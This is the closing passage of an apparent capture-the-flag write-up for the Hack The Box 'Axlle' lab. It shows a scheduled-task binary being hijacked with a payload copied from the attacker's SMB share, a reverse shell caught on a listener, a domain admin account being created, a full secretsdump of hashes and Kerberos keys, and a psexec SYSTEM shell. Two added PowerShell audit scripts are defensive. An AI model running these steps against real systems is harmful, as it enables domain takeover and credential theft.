Binary Hijacking
It was discovered that there is an automated task periodically executing a binary, C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe. Additionally, the AXLLE\App Devs group has both read and write access to the directory. This would mean that I could just replace the binary.
*Evil-WinRM* PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64> copy \\10.10.14.110\smb\standalonerunner.exe .
Hijacking the binary with the payload
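The weakness behind this step is a scheduled task running with high privileges whose executable lives in a directory writable by a lower-privileged group. The following PowerShell audit is an added example, not part of the original writeup or the Axlle lab: it walks every scheduled task, resolves the executable of each action, and reports any ACE that grants write, modify or full control on the binary or its parent directory to a watched principal. Only the group name AXLLE\App Devs comes from the writeup; the other principals in the list are generic defaults you would tune for your own environment. It assumes it is run in an elevated PowerShell session on the host being audited.

```powershell
# Added audit example (not from the original writeup). Flags scheduled tasks whose
# executable, or the directory that holds it, can be written by a watched principal.

# Principals that should never be able to replace a task's binary. 'AXLLE\App Devs'
# is the group named in the writeup; the rest are common low-privilege identities.
$WatchedPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE',
    'AXLLE\App Devs'
)

# Rights that allow replacing or tampering with a file in place.
$R = [System.Security.AccessControl.FileSystemRights]
$WriteMask = $R::Write -bor $R::Modify -bor $R::FullControl -bor
             $R::Delete -bor $R::ChangePermissions -bor $R::TakeOwnership

function Get-WritableAces {
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return @() }
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($_.FileSystemRights -band $WriteMask) -ne 0 -and
        ($WatchedPrincipals -contains $_.IdentityReference.Value)
    }
}

function Resolve-TaskExecutable {
    param([string]$Execute)
    # Task actions may quote the path or use %SystemRoot%-style variables.
    $p = [Environment]::ExpandEnvironmentVariables($Execute.Trim('"'))
    if ([System.IO.Path]::IsPathRooted($p)) { return $p }
    # Unqualified names (e.g. "cmd.exe") resolve through PATH, the same way the task scheduler does.
    $cmd = Get-Command $p -ErrorAction SilentlyContinue
    if ($cmd -and $cmd.Source) { return $cmd.Source }
    return $null
}

$findings = foreach ($task in Get-ScheduledTask) {
    foreach ($action in $task.Actions) {
        if (-not $action.Execute) { continue }      # COM-handler actions have no Execute
        $exe = Resolve-TaskExecutable $action.Execute
        if (-not $exe) { continue }
        $dir = Split-Path -Parent $exe
        # Both the file and its directory matter: write on the directory is enough
        # to delete and re-create the binary even when the file ACL itself is tight.
        foreach ($target in @($exe, $dir)) {
            foreach ($ace in (Get-WritableAces $target)) {
                [pscustomobject]@{
                    Task      = "$($task.TaskPath)$($task.TaskName)"
                    RunAs     = $task.Principal.UserId
                    Writable  = $target
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                }
            }
        }
    }
}

$findings | Sort-Object Task | Format-Table -AutoSize
```

Read the RunAs column together with Principal: the dangerous combination is a task that runs as an administrator or SYSTEM while a less privileged principal can write the path, which is exactly the situation above (the task ran with the administrator's privileges and AXLLE\App Devs could write the directory). The fix is to restrict write access on the binary and its directory to Administrators, SYSTEM and TrustedInstaller, or to run the task under an account with no more rights than the job needs.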
┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.110] from (UNKNOWN) [10.10.11.21] 62784
Microsoft Windows [Version 10.0.20348.2527]
(c) Microsoft Corporation. All rights reserved.
C:\>whoami
whoami
axlle\administrator
C:\>hostname
hostname
MAINFRAME
C:\>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::133
IPv6 Address. . . . . . . . . . . : dead:beef::3639:612c:2fa5:d871
Link-local IPv6 Address . . . . . : fe80::88b8:44c8:5dc4:622c%11
IPv4 Address. . . . . . . . . . . : 10.10.11.21
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1bd3%11
10.10.10.2
System Level Compromise
Hashdump
PS C:\Users\Administrator\Desktop> net user adm1n Qwer1234 /ADD /DOMAIN
net user adm1n Qwer1234 /ADD /DOMAIN
The command completed successfully.
PS C:\Users\Administrator\Desktop> net groups "Domain Admins" /ADD adm1n
net groups "Domain Admins" /ADD adm1n
The command completed successfully.
Creating a DA
┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ impacket-secretsdump AXLLE.HTB/adm1n:Qwer1234@mainframe.axlle.htb -k -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x3e4ae85a02ffdaf95b4c5c29169996eb
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:29bab6d9d4208e11bdd57768e7a4bd2f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
AXLLE\MAINFRAME$:plain_password_hex:c505777562333892d5dda1aaf5fb313a92b679350ec1fd0a905582c090c5cfce48621da1ef31c7797e04c699b51d699f3dd0aee519de343ce505a59576b5702cb51c0e0c35b127accfc37135a7c5a72544986f755cbcd9bba4b69c2fb0daac1ded2a6b2a3f1b4a25fa8e2beb66b340feb688807f5fb3a61ac0b7a7b26fca9c568188b6ce93442fe603e83df29df708c08dad0ea0cf58488e250b47bcac3462df5a59c8d3990729d0f160432df435f48fa9751490fa3b83848892e3fc02d43781b73c99df66fc24128c96b6c88b108137e2395ea2cbf028ad769ec241ba19101522546625684312f348fa2797e4e434b6
AXLLE\MAINFRAME$:aad3b435b51404eeaad3b435b51404ee:011a082f7649082b7fe7521c2ae2bb2a:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xeaa9353ae32a4ea48059131477fadfb0121dceae
dpapi_userkey:0xba70c3013bb0cd1c4e0222739fb2246cfc3825ba
[*] NL$KM
0000 13 32 FF B1 04 44 69 69 FA 70 9C B8 20 9A AE F9 .2...Dii.p.. ...
0010 C2 05 FF E7 EA C3 54 16 05 38 DD 19 48 05 13 E7 ......T..8..H...
0020 0A 40 6E 2F 6B F3 DC A3 17 47 87 6E 97 11 71 A7 .@n/k....G.n..q.
0030 B8 12 E2 17 37 AE 4A 23 B6 91 1E 64 13 56 5D DA ....7.J#...d.V].
NL$KM:1332ffb104446969fa709cb8209aaef9c205ffe7eac354160538dd19480513e70a406e2f6bf3dca31747876e971171a7b812e21737ae4a23b6911e6413565dda
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] CCache file is not found. Skipping...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6322b5b9f9daecb0fefd594fa6fafb6a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6d92f4784b46504cf3bedbc702ac03fe:::
axlle.htb\david.brice:1109:aad3b435b51404eeaad3b435b51404ee:0279f2a1f290ff139458088afb45fa3f:::
axlle.htb\frankie.rose:1110:aad3b435b51404eeaad3b435b51404ee:80c10c678c9b31e2091065c90519e529:::
axlle.htb\brad.shaw:1111:aad3b435b51404eeaad3b435b51404ee:9cefad58a9a2188687922a6cc10485a3:::
axlle.htb\samantha.jade:1112:aad3b435b51404eeaad3b435b51404ee:8047ec8cda0666f4e1c1be0ddc2d0378:::
axlle.htb\gideon.hamill:1113:aad3b435b51404eeaad3b435b51404ee:aa753e07e1fd47a45e0ecb3a0cc70dab:::
axlle.htb\xavier.edmund:1114:aad3b435b51404eeaad3b435b51404ee:9ecaa82cc22e0e1534493a03276dc02b:::
axlle.htb\emily.cook:1115:aad3b435b51404eeaad3b435b51404ee:b35775e6e9d3af6c0dcf33cef162986d:::
axlle.htb\brooke.graham:1116:aad3b435b51404eeaad3b435b51404ee:bcd1044566a9fb7fe130bdd5bcce7db1:::
axlle.htb\trent.langdon:1117:aad3b435b51404eeaad3b435b51404ee:a4bbfacd030508d12f3a203bbab8b1f8:::
axlle.htb\matt.drew:1118:aad3b435b51404eeaad3b435b51404ee:eb116285721b66b71d98803716b94616:::
axlle.htb\jess.adams:1119:aad3b435b51404eeaad3b435b51404ee:933d10a14def0ed5ffbd708092d92e4d:::
axlle.htb\jacob.greeny:1120:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
axlle.htb\simon.smalls:1121:aad3b435b51404eeaad3b435b51404ee:d14ddd0880870e9d7fcb442653b6183e:::
axlle.htb\dan.kendo:1122:aad3b435b51404eeaad3b435b51404ee:3fa7f786ca68123db7fdef522cb93a22:::
axlle.htb\lindsay.richards:1123:aad3b435b51404eeaad3b435b51404ee:71d62e4384f2e9b92169a10a29539b2d:::
axlle.htb\calum.scott:1124:aad3b435b51404eeaad3b435b51404ee:35a376bb58095b4a559fbceccdb01364:::
axlle.htb\dallon.matrix:1125:aad3b435b51404eeaad3b435b51404ee:124a4a99bf67ca4b04e2266f967daa64:::
axlle.htb\baz.humphries:1126:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
adm1n:7101:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
MAINFRAME$:1000:aad3b435b51404eeaad3b435b51404ee:011a082f7649082b7fe7521c2ae2bb2a:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9a04a367713f0fe1ed91f653f656c2193420b01d370ec4df315c3b14c805cd5b
Administrator:aes128-cts-hmac-sha1-96:cae98f39723c5170678f6aa964316977
Administrator:des-cbc-md5:fba2d3b00bec3e89
krbtgt:aes256-cts-hmac-sha1-96:ae2eb9caff08a7d80b1b9166f71a4de91e1bec20705400433383adf27f8d2a69
krbtgt:aes128-cts-hmac-sha1-96:096a951763767ceca7e1e5a5628451bd
krbtgt:des-cbc-md5:9e545e64542a7070
axlle.htb\david.brice:aes256-cts-hmac-sha1-96:c11a3cbfa80fdfe3dabfa0e5fc7a08b1fc199c26495818b6b6593b53971838c9
axlle.htb\david.brice:aes128-cts-hmac-sha1-96:e90ac01503ff90ad46acc9988a582cb8
axlle.htb\david.brice:des-cbc-md5:c2385db6c4b6d0b3
axlle.htb\frankie.rose:aes256-cts-hmac-sha1-96:ac64b7883c8e107f1dad48102eb5d8a1972100b84e1e747ab78f06702f368998
axlle.htb\frankie.rose:aes128-cts-hmac-sha1-96:a4656605c47ead66c7a9df5426aac6a7
axlle.htb\frankie.rose:des-cbc-md5:015b20582f3e4c4c
axlle.htb\brad.shaw:aes256-cts-hmac-sha1-96:5ba4537f0b8a58dc49874d6cf4a4ba77fa9ba7a223b68b7cbb3b142023373445
axlle.htb\brad.shaw:aes128-cts-hmac-sha1-96:664def88946a46f48f49097198e2123b
axlle.htb\brad.shaw:des-cbc-md5:67511349b97f7925
axlle.htb\samantha.jade:aes256-cts-hmac-sha1-96:f07d08f72302cb1070b68bda9eecabe8ebc24533a57e01a8ed1c68621ba167d4
axlle.htb\samantha.jade:aes128-cts-hmac-sha1-96:45dea3054965826800735e48b7c6bef9
axlle.htb\samantha.jade:des-cbc-md5:d0c743981f38074f
axlle.htb\gideon.hamill:aes256-cts-hmac-sha1-96:a294c1f62ed6abdac5e4da35f00bb6774187b8883d79bf1f5b0335197de6b2b3
axlle.htb\gideon.hamill:aes128-cts-hmac-sha1-96:2d99599bf6e7360904e438ae60847650
axlle.htb\gideon.hamill:des-cbc-md5:3e9158268fa2e691
axlle.htb\xavier.edmund:aes256-cts-hmac-sha1-96:5adcbd1df6ae1ccfbdad217f809b0104203856695fca0ed5dda4a8ac408b2561
axlle.htb\xavier.edmund:aes128-cts-hmac-sha1-96:768bc28a91d0d6ce06db096c5fa91379
axlle.htb\xavier.edmund:des-cbc-md5:1f79ea9db51c79c8
axlle.htb\emily.cook:aes256-cts-hmac-sha1-96:de639a5a7b08d8ba1b98a12ddac23702932a2501115942110f19600b476a6b72
axlle.htb\emily.cook:aes128-cts-hmac-sha1-96:64f7f9015eaf44545aceab0c08a0be18
axlle.htb\emily.cook:des-cbc-md5:e362626d236d29c1
axlle.htb\brooke.graham:aes256-cts-hmac-sha1-96:8a4014990f19f51c2be7884f17d498cbdc499c790658ca8b4aeb0e41b76811d0
axlle.htb\brooke.graham:aes128-cts-hmac-sha1-96:10b64c247a7123d260a4db78209add1f
axlle.htb\brooke.graham:des-cbc-md5:80011025862c6eba
axlle.htb\trent.langdon:aes256-cts-hmac-sha1-96:3789f8c3c521dc1360e692bf3c658cc58dc93ceaa5e5ed35271601e31bc5a011
axlle.htb\trent.langdon:aes128-cts-hmac-sha1-96:a20ddd25a79229f4f6b1fe244042bc66
axlle.htb\trent.langdon:des-cbc-md5:e304ce082f76c132
axlle.htb\matt.drew:aes256-cts-hmac-sha1-96:94c990b6de48942f85ee83503e9424020995ccede40a04eb40fe698e6c15c7c0
axlle.htb\matt.drew:aes128-cts-hmac-sha1-96:8fc7d4f688cf3703f61d66891ffb4349
axlle.htb\matt.drew:des-cbc-md5:619445e02ff864e5
axlle.htb\jess.adams:aes256-cts-hmac-sha1-96:2227ace881e583d7ff00d41caab262c7322d795b2653944924ae360e487ecc70
axlle.htb\jess.adams:aes128-cts-hmac-sha1-96:58d721390c9e370bab991326de3471b9
axlle.htb\jess.adams:des-cbc-md5:b3c2c7a10b7302da
axlle.htb\jacob.greeny:aes256-cts-hmac-sha1-96:4a540100ba65d314fa0c9ed1cc8c3bc081f95e511fa52fda865de05ffb468d60
axlle.htb\jacob.greeny:aes128-cts-hmac-sha1-96:58798f1287d17ea6e5abf8162c8f778b
axlle.htb\jacob.greeny:des-cbc-md5:1f92ae3267aea1a7
axlle.htb\simon.smalls:aes256-cts-hmac-sha1-96:b6b8dab9b81b6d5a44c2b0701006327e4b472100d5c15b93ceac6330a6314ccf
axlle.htb\simon.smalls:aes128-cts-hmac-sha1-96:2fab6c12a5e56bb8baab575505de9ac1
axlle.htb\simon.smalls:des-cbc-md5:047f1ad064c713d0
axlle.htb\dan.kendo:aes256-cts-hmac-sha1-96:1b3c93951ded9573a543e2492f6d3cdf5bf43cf33aaedb6a2c2e12c148d1dc23
axlle.htb\dan.kendo:aes128-cts-hmac-sha1-96:cece3c1a79567e51093a5a64ff67eccc
axlle.htb\dan.kendo:des-cbc-md5:4f86bc7f1a23a1b9
axlle.htb\lindsay.richards:aes256-cts-hmac-sha1-96:1e94d90750ba486bdba61686d89f6dfd8c49122bf3342c13fd1136afbbb01b45
axlle.htb\lindsay.richards:aes128-cts-hmac-sha1-96:1452c8734b5d8d95708879621770adfb
axlle.htb\lindsay.richards:des-cbc-md5:f404c8e697b36297
axlle.htb\calum.scott:aes256-cts-hmac-sha1-96:09a7d82acc475a40f343debb20b469563560adc8f90b45d422e950ecfb58d8c7
axlle.htb\calum.scott:aes128-cts-hmac-sha1-96:1ec39edf9580136ad7548eea60355ab8
axlle.htb\calum.scott:des-cbc-md5:d3647cf16219831c
axlle.htb\dallon.matrix:aes256-cts-hmac-sha1-96:9f7b94cbbbb01f26cbd8cf48b82f7b3db700211d37c4c98cc250bf5630f1058f
axlle.htb\dallon.matrix:aes128-cts-hmac-sha1-96:6d6f56215c90b791805dd1b01cc96f5c
axlle.htb\dallon.matrix:des-cbc-md5:9b9b2c8397ba8cb5
axlle.htb\baz.humphries:aes256-cts-hmac-sha1-96:2080b8579a387c01158216909a588c37038f6f4eef0546fccf7b2464e006accb
axlle.htb\baz.humphries:aes128-cts-hmac-sha1-96:e14423cac426390a5a973911341a0197
axlle.htb\baz.humphries:des-cbc-md5:df341ccba4c89419
adm1n:aes256-cts-hmac-sha1-96:ae3284bba5654e85cea79655db57be43e50ead33b03aaa71b1fd5dad3450297a
adm1n:aes128-cts-hmac-sha1-96:175eb193a70815aea6c6ec6a3a786446
adm1n:des-cbc-md5:cdf1ea4fe0ef32c4
MAINFRAME$:aes256-cts-hmac-sha1-96:43546f71913399b41aa44d559b7cb4dd097c8b4f8633c0115302bfff627d16c2
MAINFRAME$:aes128-cts-hmac-sha1-96:6031d3099f3e69d5cd74e5460043c830
MAINFRAME$:des-cbc-md5:2f0270d383159d38
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Domain Level Compromise
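Beyond the credentials themselves, a dump like the one above is also an audit artifact: identical NT hashes mean identical passwords, and the well-known empty-password hash or a stored LM hash points at accounts that need attention. The following PowerShell script is an added example, not part of the original writeup or of Impacket: it parses secretsdump-style `user:rid:lmhash:nthash:::` lines and reports hash reuse, empty passwords and LM hashes. The `$Dump` here-string is a constructed sample built from a handful of lines taken from the dump above; on it the script reports that adm1n, jacob.greeny and baz.humphries share one NT hash, i.e. the same password.

```powershell
# Added example (not from the original writeup): password-hygiene checks over a
# secretsdump-style hash dump. $Dump is a constructed sample using lines from the dump above.

$EmptyNt = '31d6cfe0d16ae931b73c59d7e0c089c0'   # NT hash of the empty password
$EmptyLm = 'aad3b435b51404eeaad3b435b51404ee'   # LM field when LM hash storage is disabled

$Dump = @'
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6322b5b9f9daecb0fefd594fa6fafb6a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
axlle.htb\jacob.greeny:1120:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
axlle.htb\baz.humphries:1126:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
adm1n:7101:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
AXLLE\MAINFRAME$:aad3b435b51404eeaad3b435b51404ee:011a082f7649082b7fe7521c2ae2bb2a:::
MAINFRAME$:1000:aad3b435b51404eeaad3b435b51404ee:011a082f7649082b7fe7521c2ae2bb2a:::
'@

function ConvertFrom-SecretsDump {
    param([string[]]$Lines)
    foreach ($line in $Lines) {
        # Only hash lines match; banners, LSA secrets and Kerberos key lines are skipped.
        # The RID is optional because the LSA $MACHINE.ACC line has none.
        if ($line -match '^(?<user>[^:]+):(?:(?<rid>\d+):)?(?<lm>[0-9a-fA-F]{32}):(?<nt>[0-9a-fA-F]{32}):::') {
            [pscustomobject]@{
                User = $Matches.user
                Sam  = ($Matches.user -replace '^[^\\]*\\', '')   # strip DOMAIN\ or domain.tld\ prefix
                Lm   = $Matches.lm.ToLower()
                Nt   = $Matches.nt.ToLower()
            }
        }
    }
}

# The local SAM and the domain sections both list the machine account; keep one copy per (account, hash).
$entries = ConvertFrom-SecretsDump ($Dump -split "`r?`n") | Sort-Object Sam, Nt -Unique

"== Accounts sharing an NT hash (same password) =="
$entries | Where-Object Nt -ne $EmptyNt |
    Group-Object Nt | Where-Object Count -gt 1 |
    ForEach-Object { "{0}  <-  {1}" -f $_.Name, ($_.Group.User -join ', ') }

"== Accounts with an empty password =="
$entries | Where-Object Nt -eq $EmptyNt | Select-Object -ExpandProperty User

"== Accounts with a stored LM hash (weak; disable LM storage) =="
$entries | Where-Object Lm -ne $EmptyLm | Select-Object -ExpandProperty User
```

The empty-password check will list Guest on most systems; that is only a finding if the account is enabled. Feed the script the full dump with `Get-Content dump.txt` in place of `$Dump` to run it over a real export, and treat every group it prints as a set of accounts that should be forced to change password.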
Shell Drop (SYSTEM)
┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ impacket-psexec AXLLE.HTB/adm1n:Qwer1234@mainframe.axlle.htb -k -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Requesting shares on mainframe.axlle.htb.....
[*] Found writable share ADMIN$
[*] Uploading file pHwAsqjr.exe
[*] Opening SVCManager on mainframe.axlle.htb.....
[*] Creating service nGec on mainframe.axlle.htb.....
[*] Starting service nGec.....
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
[!] Press help for extra shell commands
[-] CCache file is not found. Skipping...
Microsoft Windows [Version 10.0.20348.2527]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
MAINFRAME
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::133
IPv6 Address. . . . . . . . . . . : dead:beef::3639:612c:2fa5:d871
Link-local IPv6 Address . . . . . : fe80::88b8:44c8:5dc4:622c%11
IPv4 Address. . . . . . . . . . . : 10.10.11.21
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1bd3%11
10.10.10.2